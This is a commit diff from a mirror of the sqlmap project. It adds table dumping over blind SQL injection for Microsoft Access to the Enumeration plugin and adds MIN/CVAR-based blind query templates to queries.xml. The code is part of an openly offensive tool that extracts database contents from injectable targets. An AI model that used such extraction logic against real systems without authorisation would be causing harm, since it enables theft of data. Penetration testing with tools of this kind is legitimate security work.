sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-01-24 08:14:24 +03:00
Code Issues Packages Projects Releases Wiki Activity

development update (basic ms access dumping implemented)

Browse Source
This commit is contained in:
Miroslav Stampar 2010-12-24 19:53:11 +00:00
parent 2d115e0350
commit 706d8e0b88
2 changed files with 48 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

70
plugins/generic/enumeration.py
View File

@ -1210,36 +1210,60 @@ class Enumeration:
plusOne = False
indexRange = getRange(count, dump=True, plusOne=plusOne)
for index in indexRange:
if kb.dbms == DBMS.ACCESS:
value = " "
for column in colList:
if column not in lengths:
lengths[column] = 0
for index in indexRange:
if column not in lengths:
lengths[column] = 0
if column not in entries:
entries[column] = []
if column not in entries:
entries[column] = []
if kb.dbms in ( DBMS.MYSQL, DBMS.PGSQL ):
query = rootQuery.blind.query % (column, conf.db,
conf.tbl, index)
elif kb.dbms == DBMS.ORACLE:
query = rootQuery.blind.query % (column, column,
conf.tbl.upper(),
index)
elif kb.dbms in (DBMS.MSSQL, DBMS.SYBASE):
query = rootQuery.blind.query % (column, index, conf.db,
conf.tbl, colList[0],
colList[0], colList[0])
if column == colList[0]:
# Correction for values with unrecognized chars
if value and '?' in value and value[0]!='?':
value = value.split('?')[0]
value = value[:-1] + chr(ord(value[-1]) + 1)
query = rootQuery.blind.query % (column, conf.tbl, column, value)
else:
query = rootQuery.blind.query2 % (column, conf.tbl, colList[0], entries[column][index])
elif kb.dbms == DBMS.SQLITE:
query = rootQuery.blind.query % (column, conf.tbl, index)
value = inject.getValue(query, inband=False)
lengths[column] = max(lengths[column], len(value))
entries[column].append(value)
elif kb.dbms == DBMS.FIREBIRD:
query = rootQuery.blind.query % (index, column, conf.tbl)
else:
for index in indexRange:
for column in colList:
if column not in lengths:
lengths[column] = 0
value = inject.getValue(query, inband=False)
if column not in entries:
entries[column] = []
lengths[column] = max(lengths[column], len(value))
entries[column].append(value)
if kb.dbms in ( DBMS.MYSQL, DBMS.PGSQL ):
query = rootQuery.blind.query % (column, conf.db,
conf.tbl, index)
elif kb.dbms == DBMS.ORACLE:
query = rootQuery.blind.query % (column, column,
conf.tbl.upper(),
index)
elif kb.dbms in (DBMS.MSSQL, DBMS.SYBASE):
query = rootQuery.blind.query % (column, index, conf.db,
conf.tbl, colList[0],
colList[0], colList[0])
elif kb.dbms == DBMS.SQLITE:
query = rootQuery.blind.query % (column, conf.tbl, index)
elif kb.dbms == DBMS.FIREBIRD:
query = rootQuery.blind.query % (index, column, conf.tbl)
value = inject.getValue(query, inband=False)
lengths[column] = max(lengths[column], len(value))
entries[column].append(value)
for column, columnEntries in entries.items():
if lengths[column] < len(column):

2
xml/queries.xml
View File

@ -359,7 +359,7 @@
<tables/>
<dump_table>
<inband query="SELECT %s FROM %s"/>
<blind query="SELECT MIN(%s) FROM %s WHERE %s > '%s'" count="SELECT COUNT(*) FROM %s"/>
<blind query="SELECT MIN(%s) FROM %s WHERE CVAR(%s) > '%s'" query2="SELECT %s FROM %s WHERE %s = '%s'" count="SELECT COUNT(*) FROM %s"/>
</dump_table>
</dbms>